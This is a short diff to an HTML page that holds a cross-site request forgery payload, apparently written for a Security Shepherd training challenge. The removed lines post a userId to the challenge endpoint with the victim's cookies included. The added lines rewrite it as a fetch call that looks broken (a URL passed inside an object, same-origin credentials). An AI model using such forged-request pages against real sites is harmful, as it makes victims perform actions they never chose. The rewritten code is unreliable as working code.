--- a/csrf.html
+++ b/csrf.html
@@ -1,12 +1,18 @@
 <html><head>
-<script>
-    var data = new FormData();
-    data.append("userId", "8a1a261afaa67332ec17bdf95870e76c497c28a0");
-    fetch('https://security-shepherd.dev.inf.elasticnet.co/user/csrfchallengetwo/plusplus', {
+<script>  
+    fetch({
+      url: 'https://security-shepherd.dev.inf.elasticnet.co/user/csrfchallengetwo/plusplus?userId=8a1a261afaa67332ec17bdf95870e76c497c28a0',
       method: 'POST',
-      body: data,
-      credentials: "include",
-      mode: "no-cors"
+      mode: "cors",
+      credentials: 'same-origin' 
+    })
+    .then(response => response)
+    .then(result => {
+      console.log("result");
+      console.log('Success:', result.text().then( a => console.log(a)));
+    })
+    .catch(error => {
+      console.error('Error:', error);
     });
   </script>
 </head>
